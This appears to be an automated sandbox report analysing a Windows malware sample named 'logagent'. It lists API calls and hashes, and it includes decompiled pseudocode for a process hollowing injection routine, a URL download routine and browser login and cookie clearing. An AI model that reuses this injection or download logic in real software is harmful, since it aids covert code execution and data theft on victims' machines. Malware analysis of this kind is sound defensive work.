                                  • Instruction ID: a50f86551d48fcfb420bec0d8969bad93b6fe5ccc4e0857a432ebec01e6f54a5
                                  • Opcode Fuzzy Hash: 7436737d771e6f94204cdcbc6dd436a297a8087e31d0d939b25b7b7780cd4931
                                  • Instruction Fuzzy Hash: 4BA1FA72C0051EEFCB159B90EC98EEEBB78FF48345F148066F516A6060EB716A49CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041000F Relevance: 18.1, APIs: 12, Instructions: 81COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                  • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 0041003D
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 0041004D
                                  • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 00410078
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 004100DF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$DisplayEnum$??0?$basic_string@??1?$basic_string@Devices$G@1@@V01@@$G@2@@0@Hstd@@MonitorsV01@V10@V?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 2807017801-0
                                  • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                  • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401EA2 Relevance: 18.1, APIs: 12, Instructions: 80COMMON
                                  Download Yara Rule
                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00401EA7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                  • String ID:
                                  • API String ID: 3851886811-0
                                  • Opcode ID: b245657c581309824243aae834912e95f89f18888930cb7fc5c3683aee86cf05
                                  • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                  • Opcode Fuzzy Hash: b245657c581309824243aae834912e95f89f18888930cb7fc5c3683aee86cf05
                                  • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054BF84 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 222sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 1054BF8D
                                    • Part of subcall function 1054D1B8: RegCreateKeyA.ADVAPI32(80000001,10549389,10549389), ref: 1054D1C5
                                    • Part of subcall function 1054D1B8: RegSetValueExA.ADVAPI32(10549389,?,00000000,00000004,004151D4,00000004,004151D4,?,10549389,80000001,00000000), ref: 1054D1E0
                                    • Part of subcall function 1054D1B8: RegCloseKey.ADVAPI32(10549389,?,10549389,80000001,00000000), ref: 1054D1EB
                                  • OpenMutexA.KERNEL32(00100000,00000000), ref: 1054BFCA
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 1054C063
                                    • Part of subcall function 1054C25D: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,1054C1FE), ref: 1054C26B
                                    • Part of subcall function 1054C25D: WaitForSingleObject.KERNEL32(00000000,000000FF,?,1054C1FE), ref: 1054C276
                                    • Part of subcall function 1054C25D: CloseHandle.KERNEL32(00000000,?,1054C1FE), ref: 1054C27D
                                  • _wgetenv.MSVCRT ref: 1054C142
                                  • CloseHandle.KERNEL32(00000000), ref: 1054BFD9
                                    • Part of subcall function 105539CA: GetLocalTime.KERNEL32(?), ref: 105539E1
                                    • Part of subcall function 105539CA: printf.MSVCRT ref: 10553A4E
                                    • Part of subcall function 1054CE57: RegOpenKeyExA.ADVAPI32(80000001,105493F8,00000000,00020019,105493F8,?,?,?,105493F8,80000001,00000000), ref: 1054CE76
                                    • Part of subcall function 1054CE57: RegQueryValueExA.ADVAPI32(105493F8,?,00000000,80000001,?,00000000,80000001,?,?,?,105493F8,80000001,00000000), ref: 1054CE94
                                    • Part of subcall function 1054CE57: RegCloseKey.ADVAPI32(105493F8,?,?,?,105493F8,80000001,00000000), ref: 1054CE9F
                                  • _wgetenv.MSVCRT ref: 1054C0E7
                                  • Sleep.KERNEL32(000007D0), ref: 1054C1ED
                                  • CloseHandle.KERNEL32 ref: 1054C239
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$Open$HandleProcess$Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeWaitprintf
                                  • String ID: WDH$[INFO]
                                  • API String ID: 2937977308-2767913320
                                  • Opcode ID: 6f1dca8998d8823082caa928487a950551165747325d3f005bae5b6199a57138
                                  • Instruction ID: 19ad8c2934c846753b4f780e9caa88e37245932c779a4ab6438a6790fe7b6faf
                                  • Opcode Fuzzy Hash: 6f1dca8998d8823082caa928487a950551165747325d3f005bae5b6199a57138
                                  • Instruction Fuzzy Hash: E571527690050DEBDB04ABE0EC4E9EE7F7CEF84341F504066F912D2190EBB55A49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10550BA8 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 157threadmemoryprocessCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 48%
                                  			E10550BA8() {
				short* _t59;
				void* _t60;
				void _t71;
				void* _t72;
				signed int _t74;
				CONTEXT* _t80;
				intOrPtr _t85;
				intOrPtr* _t93;
				signed int _t95;
				intOrPtr _t100;
				CONTEXT* _t110;
				intOrPtr* _t111;
				struct _PROCESS_INFORMATION* _t114;
				void* _t115;
				void* _t117;

				L10555859();
				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA(0x4169ec), 0x4169f8);
				_t59 =  *((intOrPtr*)(_t115 + 0xc));
				 *((intOrPtr*)(_t115 - 0x74)) = _t59;
				if( *_t59 != 0x5a4d) {
					L16:
					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
					_t60 = 0;
				} else {
					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
					if( *_t93 != 0x4550) {
						goto L16;
					} else {
						_t95 = 0x11;
						memset(_t115 - 0x60, 0, _t95 << 2);
						_t114 =  *(_t115 + 0x10);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
							goto L16;
						} else {
							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
							 *(_t115 - 0x70) = _t110;
							_t110->ContextFlags = 0x10007;
							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
								goto L16;
							} else {
								_t71 =  *(_t115 - 0x1c);
								if(_t71 ==  *(_t93 + 0x34)) {
									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
								}
								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
								 *(_t115 - 0x6c) = _t72;
								if(_t72 == 0) {
									goto L16;
								} else {
									_push(0);
									_push( *((intOrPtr*)(_t93 + 0x54)));
									_push( *((intOrPtr*)(_t115 + 0xc)));
									_push(_t72);
									_push(_t114->hProcess);
									_t111 =  *0x415104;
									if( *_t111() == 0) {
										goto L16;
									} else {
										_t74 = 0;
										 *(_t115 - 0x64) = 0;
										while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
											_t100 =  *((intOrPtr*)(_t115 + 0xc));
											_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
											 *((intOrPtr*)(_t115 - 0x68)) = _t85;
											 *_t111(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *((intOrPtr*)(_t85 + 0x10)), 0);
											 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
											_t74 =  *(_t115 - 0x64);
										}
										_push(0);
										_push(4);
										_push(_t93 + 0x34);
										_push( *(_t115 - 0x70)->Ebx + 8);
										_push( *_t114);
										if( *_t111() == 0) {
											goto L16;
										} else {
											_t80 =  *(_t115 - 0x70);
											_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
											if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
												goto L16;
											} else {
												_t60 = 1;
											}
										}
									}
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
				return _t60;
			}


















                                  0x10550bad
                                  0x10550bb8
                                  0x10550bbb
                                  0x10550bd6
                                  0x10550bd9
                                  0x10550bdc
                                  0x10550be4
                                  0x10550d56
                                  0x10550d56
                                  0x10550d5a
                                  0x10550bea
                                  0x10550bed
                                  0x10550bef
                                  0x10550bf8
                                  0x00000000
                                  0x10550bfe
                                  0x10550c00
                                  0x10550c06
                                  0x10550c08
                                  0x10550c0d
                                  0x10550c0e
                                  0x10550c0f
                                  0x10550c10
                                  0x10550c2b
                                  0x00000000
                                  0x10550c31
                                  0x10550c41
                                  0x10550c43
                                  0x10550c46
                                  0x10550c58
                                  0x00000000
                                  0x10550c80
                                  0x10550c80
                                  0x10550c86
                                  0x10550c8b
                                  0x10550c8b
                                  0x10550c9d
                                  0x10550ca3
                                  0x10550ca8
                                  0x00000000
                                  0x10550cae
                                  0x10550cae
                                  0x10550cb0
                                  0x10550cb3
                                  0x10550cb6
                                  0x10550cb7
                                  0x10550cb9
                                  0x10550cc3
                                  0x00000000
                                  0x10550cc9
                                  0x10550cc9
                                  0x10550ccb
                                  0x10550cce
                                  0x10550cd9
                                  0x10550ce2
                                  0x10550ce9
                                  0x10550d00
                                  0x10550d02
                                  0x10550d05
                                  0x10550d05
                                  0x10550d0a
                                  0x10550d0c
                                  0x10550d11
                                  0x10550d1e
                                  0x10550d1f
                                  0x10550d25
                                  0x00000000
                                  0x10550d27
                                  0x10550d2d
                                  0x10550d30
                                  0x10550d42
                                  0x00000000
                                  0x10550d52
                                  0x10550d52
                                  0x10550d52
                                  0x10550d42
                                  0x10550d25
                                  0x10550cc3
                                  0x10550ca8
                                  0x10550c58
                                  0x10550c2b
                                  0x10550bf8
                                  0x10550d5f
                                  0x10550d6a

                                  APIs
                                  • GetModuleHandleA.KERNEL32(004169EC,004169F8), ref: 10550BC9
                                  • GetProcAddress.KERNEL32(00000000), ref: 10550BD0
                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 10550C23
                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 10550C3B
                                  • GetThreadContext.KERNEL32(?,00000000), ref: 10550C50
                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 10550C72
                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 10550C9D
                                  • SetThreadContext.KERNEL32(?,?), ref: 10550D3A
                                  • ResumeThread.KERNEL32(?), ref: 10550D47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Thread$AllocContextProcessVirtual$AddressCreateHandleMemoryModuleProcReadResume
                                  • String ID: 0BA
                                  • API String ID: 4213851006-415129603
                                  • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction ID: 356bb68748202ab592250045de71b386063e647c97028593979ceead549de44f
                                  • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction Fuzzy Hash: 9A514C71A00205EFDB119FA4CC85FAABBB9FF85750F214169FA14DB2A1D771E844CB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004133FE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041343B
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B10,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041347F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416D58,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134BA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B18,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134F5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 00413537
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?), ref: 00413562
                                  • SystemParametersInfoW.USER32 ref: 00413580
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@D@1@@$??1?$basic_string@?c_str@?$basic_string@?size@?$basic_string@CloseCreateInfoParametersSystemValue
                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                  • API String ID: 3561681748-3576401099
                                  • Opcode ID: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                  • Instruction ID: 9cbbbfad74e45987a2bd5f73a37c109ae42610d4aeaf5eddbb83fc0603d2e269
                                  • Opcode Fuzzy Hash: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                  • Instruction Fuzzy Hash: 5041A772B50604BBEB1076A59C47FEF393ED780B50F51006AF9116B2C1D7AA8AC446EF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412553 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103networkfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
				void* _v8;
				char* _v12;
				void* _v16;
				void _v10016;
				void* _t35;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				unsigned int* _t55;
				signed int _t57;
				signed int _t58;
				signed int _t64;
				signed int _t74;
				char* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;

				E00413ED0(0x271c, __ecx);
				_t55 = _a12;
				_a15 = _a15 & 0x00000000;
				_t98 = 0;
				 *_a8 = 0;
				 *_t55 = 0;
				_t35 = InternetOpenA("user", 1, 0, 0, 0);
				_v16 = _t35;
				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
				_v8 = _t36;
				if(_t36 != 0) {
					_a12 = 0;
					_a4 = 0;
					while(1) {
						_t10 =  &_a12; // 0x415664
						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
						if(_t42 != 0 && _a12 <= _t98) {
							break;
						}
						_t44 =  *_t55 + _a12;
						_push(_t44);
						L00413E84();
						_t57 =  *_t55;
						_t100 = _a4;
						_t58 = _t57 >> 2;
						_v12 = memcpy(_t44, _t100, _t58 << 2);
						_push(_a4);
						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
						_t101 =  &_v10016;
						_t64 = _a12 >> 2;
						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
						_t103 = _t103 + 0x30;
						L00413EBE();
						_a4 = _v12;
						 *_t55 =  *_t55 + _a12;
						_t98 = 0;
					}
					_push( *_t55);
					L00413E84();
					_t102 = _a4;
					 *_a8 = _t42;
					_t74 =  *_t55 >> 2;
					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
					_a15 = 1;
				}
				InternetCloseHandle(_v16);
				InternetCloseHandle(_v8);
				return _a15;
			}






















                                  0x0041255b
                                  0x00412564
                                  0x00412568
                                  0x0041256c
                                  0x00412573
                                  0x0041257a
                                  0x0041257c
                                  0x0041258d
                                  0x00412591
                                  0x00412599
                                  0x0041259c
                                  0x004125a3
                                  0x004125a6
                                  0x004125a9
                                  0x004125a9
                                  0x004125bc
                                  0x004125c4
                                  0x00000000
                                  0x00000000
                                  0x004125cd
                                  0x004125d0
                                  0x004125d1
                                  0x004125d6
                                  0x004125d8
                                  0x004125df
                                  0x004125e6
                                  0x004125ec
                                  0x004125ef
                                  0x004125fa
                                  0x00412600
                                  0x0041260a
                                  0x0041260a
                                  0x0041260c
                                  0x00412615
                                  0x0041261b
                                  0x0041261e
                                  0x0041261e
                                  0x00412622
                                  0x00412624
                                  0x0041262a
                                  0x00412632
                                  0x00412638
                                  0x00412642
                                  0x00412644
                                  0x00412648
                                  0x00412652
                                  0x00412657
                                  0x0041265f

                                  APIs
                                  • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                  • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                  • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                  • InternetCloseHandle.WININET(?), ref: 00412652
                                  • InternetCloseHandle.WININET(00000000), ref: 00412657
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                  • String ID: dVA$user
                                  • API String ID: 3314639739-756348157
                                  • Opcode ID: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                  • Opcode Fuzzy Hash: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004078BB Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 100sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E004078BB(void* __ecx) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v8;
				void* _t40;
				void* _t44;

				_push(__ecx);
				 *0x41b9b8 = 1;
				Sleep( *0x41b9b4);
				_v5 = _v5 & 0x00000000;
				_v6 = _v6 & 0x00000000;
				_v7 = _v7 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t44 = 0;
				do {
					if(_v5 == 0) {
						L2:
						_v5 = E00407767();
					}
					if(_v6 == 0) {
						_v6 = E0040751B();
					}
					if(_v8 == 0) {
						_v8 = E0040728F();
					}
					if(_v7 == 0) {
						_v7 = E004071CF();
					}
					if(_t44 == 0) {
						_t44 = E0040710F();
					}
					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
						Sleep(0x1388);
					}
					if(_v5 == 0) {
						goto L2;
					}
				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E00407A90("\n[Cleared browsers logins and cookies.]\n");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
				_t40 = E004020C2(0x41be70, 0xaf, 0x415664);
				if( *0x41b9b0 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					E0040B829(0x80000001, _t40, "FR", 1);
				}
				 *0x41b9b8 =  *0x41b9b8 & 0x00000000;
				return 0;
			}









                                  0x004078be
                                  0x004078cd
                                  0x004078d4
                                  0x004078d6
                                  0x004078da
                                  0x004078de
                                  0x004078e2
                                  0x004078e6
                                  0x004078e8
                                  0x004078ec
                                  0x004078ee
                                  0x004078f3
                                  0x004078f3
                                  0x004078fa
                                  0x00407901
                                  0x00407901
                                  0x00407908
                                  0x0040790f
                                  0x0040790f
                                  0x00407916
                                  0x0040791d
                                  0x0040791d
                                  0x00407922
                                  0x00407929
                                  0x00407929
                                  0x0040792f
                                  0x0040794c
                                  0x0040794c
                                  0x00407952
                                  0x00000000
                                  0x00000000
                                  0x00407954
                                  0x0040797c
                                  0x00407982
                                  0x00407992
                                  0x004079a6
                                  0x004079ac
                                  0x004079bf
                                  0x004079cf
                                  0x004079db
                                  0x004079e9
                                  0x004079f5
                                  0x004079fa
                                  0x004079fd
                                  0x00407a09

                                  APIs
                                  • Sleep.KERNEL32 ref: 004078D4
                                  • Sleep.KERNEL32(00001388), ref: 0040794C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
